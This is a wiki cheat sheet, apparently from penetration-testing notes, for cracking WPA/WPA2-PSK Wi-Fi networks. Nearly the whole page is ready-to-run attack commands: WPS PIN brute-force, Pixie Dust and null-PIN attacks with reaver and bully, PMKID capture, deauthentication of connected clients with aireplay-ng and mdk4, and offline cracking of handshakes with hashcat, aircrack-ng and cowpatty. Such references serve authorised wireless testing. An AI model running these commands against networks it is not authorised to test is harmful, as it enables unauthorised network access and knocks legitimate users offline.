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07. WPA WPA2 Personal (PSK) Authentication Cracking

Koutto edited this page Nov 1, 2020 · 1 revision

WPS PIN Attacks

WPS Detection

wash -i mon0
wash -i mon0 -c <channel> 		# Specific channel
wash -i mon0 -c <channel> -C 	# -C ignores frame checksum errors

Known WPS PINs + Known PIN Generation Algorithms

PIN Smart bruteforce using known PINs for APs of certain manufacturers + known PIN generation algorithms # => select "Known PINs database based attack"

WPS PIN Bruteforce (online)

reaver -i mon0 -b <MAC_AP> -c <channel> -f -N [-L -d 2 -S] -vv
  • -f disable channel hopping
  • -N do not send NACK messages when out of order packets are received
  • -L Ignore locked state reported by target AP
  • -d Set delay between PIN attemps
  • -S choose small Diffie-Hellman values to minimize load on the AP (can speed up cracking)
bully mon0 -b <MAC_AP> -c <channel> -S -F -B -v 3
  • -S sequential PINs (no randomize)
  • -F force continue even if warnings
  • -B bruteforce mode

WPS Pixie Dust Attack (offline bruteforce)

reaver -i mon0 -b <MAC_AP> -c <channel> -K -N -vv
bully mon0 -b <MAC_AP> -d -v 3

Lists of vulnerable routers:

Null PIN attack

reaver -i mon0 -b <MAC_AP> -c <channel> -f -N -g 1 -vv -p ''


wifite --wps-only  # Only WPS attacks
wifite --wps-only --pixie  # Only WPS offline bruteforce attack "Pixie-Dust"
wifite --wps-only --no-pixie  # Only WPS online bruteforce attack "PIN attack"

Get WPA/WPA2 Passphrase from WPS PIN

reaver -i wlan0 -b <MAC_AP> -p <PIN_found>

WPA/WPA2 PMKID Capture & Bruteforce (client-less attack)

  1. Capture PMKID:
hcxdumptool -i mon0 -o capture.pcapng --enable_status=1 -c <channel>
./eaphammer --pmkid --interface wlan0 --channel <channel> --bssid <MAC_AP>  # Alternative using eaphammer
  1. Convert captured data to hashcat format:
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z capture.16800 capture.pcapng
  1. Crack hash with hashcat:
hashcat -m 16800 capture.16800 -a 3 -w 4 '?l?l?l?l?l?lt'  # Bruteforce all possible combination of 8-chars lowercase
hashcat -m 16800 capture.16800 -a 0 -w 4 <wordlist>  # Dictionary attack

Alternative: Automatic PMKID capture & bruteforce using wifite tool:

wifite --pmkid

Handshake Capture & Cracking (requires connected client)

  1. Capture traffic & write captured handshakes to file
airdump-ng -c <channel> --bssid <AP_MAC> -w <capture> mon0
  1. Deauthenticate client from AP:
aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0

Alternative with mdk4:

mdk4 mon0 d -b <MAC_AP_file> -c <channel>  # MAC_AP_file stores MAC address of AP. All clients connected to the AP will be targeted
  1. Crack:
aircrack-ng -a 2 -b <AP_MAC> -w <wordlist> <capture>
  1. Alternative with Hashcat:

    • Convert capture (.cap/.pcap) to hashcat format (.hccapx) using hashcat-utils tool cap2hccapx:
    cap2hccapx <input.pcap> <output.hccapx>
    • Crack:
    hashcat -m 2500 <capture.hccapx> -a 0 <wordlist>  # Dictionary attack
  2. Alternative with Cowpatty:

cowpatty -f <wordlist> -r <capture> -s <SSID>

Check Handshake is in Capture

  • aircrack-ng:
aircrack-ng <capture>  # Check for target BSSID/ESSID
  • tshark:
    Filter on EAPOL message. There should be 4 messages for a complete hanshake:
tshark -r <capture> -n -Y eapol
  • cowpatty:
cowpatty -r <capture> -s <ESSID> -f -
  • pyrit:
pyrit -r <capture> analyze
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